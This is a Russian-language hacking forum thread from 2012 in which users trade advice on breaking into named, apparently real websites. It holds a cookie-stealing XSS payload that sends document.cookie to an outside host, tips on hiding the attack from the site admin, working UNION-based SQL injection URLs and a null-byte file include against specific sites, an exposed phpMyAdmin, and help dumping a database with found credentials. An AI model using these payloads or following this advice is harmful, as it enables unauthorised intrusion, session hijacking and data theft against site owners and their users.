Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Никак, если нет обработчика.
     
    1 person likes this.
  2. Bahamut

    Bahamut Banned

    Joined:
    7 Dec 2011
    Messages:
    10
    Likes Received:
    3
    Reputations:
    0
    а где можно про это прочитать, просто сканер говорит что залил этим методом файл
     
  3. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Сканер говорит умеет?))) ЖеСтЬ! Эти всякие методы нужны, когда в определенную папку не пускают, например при:
    <limit GET>
    ..
    Можно обойти авторизацию, отправив POST запрос.
     
  4. NZT

    NZT New Member

    Joined:
    31 Dec 2011
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    M_script ты имеешь виду чтобы такого небыло :
    [​IMG]
    Это появляется когда я в строке name пишу <script>
    img = new Image(); img.src = "http://httpz.ru/n6gmto41z00.gif?"+document.cookie;
    </script> , а вот source : <br />

    <div id="guestbook_comments">Name: test <br />Message: This is a test comment. <br /></div><div id="guestbook_comments">Name: <script> img = new Image(); img.src = "http://httpz.ru/n6gmto41z00.gif?"+document.cookie; </script <br />Message: fsdfsdf <br /></div>
    <br />

    Я как не пытался это исправить чтобы name и message были на разных строчках у меня не получилось , подскажи что нужно написать чтобы message был на строчку ниже.


    trololoman96 я это понимаю , но для того чтобы узнать что вырезается а что нет мне надо попробовать <sc<script>ript>alert()</sc</script>ript> , и тогда я уже знаю что писать , но ведь когда я это пробую то в сообщении появляется слово ript> : [​IMG] , и это уже вызовет у админа подозрение что здесь что то не так, правильно я думаю? Можно ли как то узнать что писать подругому , чтобы не вызвать подозрений , или все так делают и пофиг что будет и пофиг что страница искажается (как в первой части сообщения) или всетаки надо все делать акуратно ?

    И еще вопрос , как xss работает? Я делаю xss и получаю куки всех зарегестрированых на сайте пользователей, теперь у меня свободный доступ к их аккаунтам . до какого времени? пока админ не прикроет дыру или пока пользователь не сменит пароль? Как это все работает? Спасибо за ответы )
     
    #19044 NZT, 15 Jan 2012
    Last edited: 15 Jan 2012
  5. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    В HTML:
    начало комментария. Если его поставишь, остальная часть сайта не откроется. И ты можешь написать админу, что сайт не грузится, он видит, что реально не грузится(а ты уже имеешь cookie) :)
     
  6. NZT

    NZT New Member

    Joined:
    31 Dec 2011
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    А если он просекет что там был скрипт который ворует куки , он может что то сделать чтобы я не зашел под админом ? Или ему этого не избежать?
     
  7. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Если сайт на заказ делали и админ ничего незнает, кроме как создание/редактирование новостей, то не узнает. Если опытный тру админ, то он по ссылке не перейдет, даже если перешел перелогинится(чтоб украденные куки были негодны) и зафиксить уязвимость.
     
  8. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,419
    Likes Received:
    815
    Reputations:
    848
    Можно удалить сесию, (корректно выйти из админки) или удалить сесию на серваке, и ваши куки вам не помогут.
     
    _________________________
  9. NZT

    NZT New Member

    Joined:
    31 Dec 2011
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    Понял. Большое спасибо за ответы.
     
  10. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    права в папке есть, на правку, залив
    но почему-то ничего не льется и не редактируется
    сервер виндосовский

    2ereee, это уже другой :D
     
    _________________________
  11. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    72
    Likes Received:
    6
    Reputations:
    -1
    http://www.toytricksy.com/?a=index
    проконсультируйте это пхп инъекцыя иль нет??
     
  12. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    792
    Likes Received:
    349
    Reputations:
    120
    нет. это ошибка подключения другого файла, который не передаётся в параметре.
     
  13. AnGeI

    AnGeI Elder - Старейшина

    Joined:
    8 Dec 2008
    Messages:
    396
    Likes Received:
    79
    Reputations:
    16
    Инклуд с фильтром:
    PHP:
    import_request_variables('GPC');
    if (
    strstr($file,'..') || strstr($file,'//') || strstr($file,'http'
    || 
    strstr($file,'interface') ) exit;
    Есть ли там где-то еще читалка, с помощью которой этот код можно получить? (код получен не мною)
     
  14. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    532
    Likes Received:
    61
    Reputations:
    53
    http://www.sitc.ru/index.php?id=90000512
    тиц 350

    blind sql.
    реально такое раскрутить? без information_schema то
     
    #19054 justonline, 17 Jan 2012
    Last edited: 17 Jan 2012
  15. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    123
    Likes Received:
    34
    Reputations:
    55
    Реально, также брутишь таблицы, колонки и через блайнд забираешь инфу. И еще, там не слепая инъекция:
    Code:
    http://www.sitc.ru/index.php?id=90000512%27+and+5=4+union+select+1,2,3,4,5,version%28%29,7,8,9,10,11,12,13--+
    
    -----------------------
    AnGeI, думаю стоит копать в сторону соседних сайтов. Вот сайн на том же сервере
    http://cdut.sakh.com/phpmyadmin/ - открытый phpmyadmin (setup.php нету:))
    есть инъекция, только толку от нее нет особого
    Code:
    http://cdut.sakh.com/?view=forum&fid=-2161%27+union+select+1,2,3,4,5,6--+
    
    есть рабочий инклуд
    Code:
    http://cdut.sakh.com/?nauka=index&project=../../avatars/0.gif%00
    
    залить аватару свою не удалось, там вылетает ошибка с open_basedir. Так что если найдешь что инклудить считай шел есть ;)
    Ну и доступ в админку, авторизация на самом сайте
    ...
    Дальше копать лень, ибо все равно там ничего интересного нет, удачи ;)
     
    #19055 trololoman96, 17 Jan 2012
    Last edited: 17 Jan 2012
    2 people like this.
  16. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    72
    Likes Received:
    6
    Reputations:
    -1
    http://rzva.ru/js/menu.php?language=russian' подскажите что можно сделать, а то чет не реагирует на запросы((
     
  17. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,022
    Likes Received:
    129
    Reputations:
    23
    Ребята, какая то мне не понятная ситуация ))
    в одном сервере мне надо "выгрузить" (дампить) SQL базу и чтоб нормально читался:)
    через бразуер когда открываю на сервере - получаю что то в роде шифрованного текста, пытался кодировку менять, но бестолку..
    но там также есть конфиграционный файл, с логином и паролем типа такого:
    Code:
    mysql username = "logn"
    mysql password = "password"
    
    ###
    
    '1 list' table name        = "rep1"
    'reports' table name prefix  = "rep2"
    '2' table name = "h"
    
    mysql db name  = "NAME"
    mysql host     = "127.0.0.1"
    mysql port     = "3306"
    mysql unix socket = "/var/run/mysqld/mysqld.sock"
    
    ### config end
    помогите снять информацию !

    Не пинать сильно, можно сказать не соображаю в этом деле )) особо в кодинге php/sql, по этому лучше посоветуйте как можно "автоматический" метод.
     
  18. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    792
    Likes Received:
    349
    Reputations:
    120
    ты уже сделал дамп? что ты в браузере открываешь?
    если сделал, то скачай его на винт и открывай не в браузере.
    если нет, то найди пма, залогинись с данными из файла и сделай экспорт базы. возможные папки:
    phpmyadmin
    pma
    myadmin, etc... гугли
    если есть доступ к файлам, то поставь дампер какой-нить, например:
    http://sypex.net/ru/products/dumper/downloads/
    если есть доступ к консоли, то через mysqldump сделай:
    http://dev.mysql.com/doc/refman/5.1/en/mysqldump.html
     
    4 people like this.
  19. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Там что-то типа
    PHP:
    $lang "";
    if(
    $_GET['language'] == 'russian'$lang 1;
    mysql_query("SELECT .. WHERE lang={$lang} AND ....");
    Думаю что как-то так и выглядит код.

    Инъекции нет.
    Этот код просто написан по реакции скрипта на параметры, не более.

    Где ты там Blind нашел?
    http://www.sitc.ru/index.php?id=90000512%27%20and%201=3%20union%20select%201,2,3,4,version%28%29,6,7,8,9,10,11,12,13%20--%201

    Да, версия 4, обычный брут таблиц/колонок катит.
     
    #19059 Boolean, 18 Jan 2012
    Last edited: 18 Jan 2012
  20. narviss

    narviss New Member

    Joined:
    1 Aug 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Эээ..идиотский фильтр :mad:
    Дело в том, что фильтруется точка information_shema. так что information_shema никак ненапишешь...как обойти такой фильтр?
     
    #19060 narviss, 19 Jan 2012
    Last edited: 19 Jan 2012
Loading...
Thread Status:
Not open for further replies.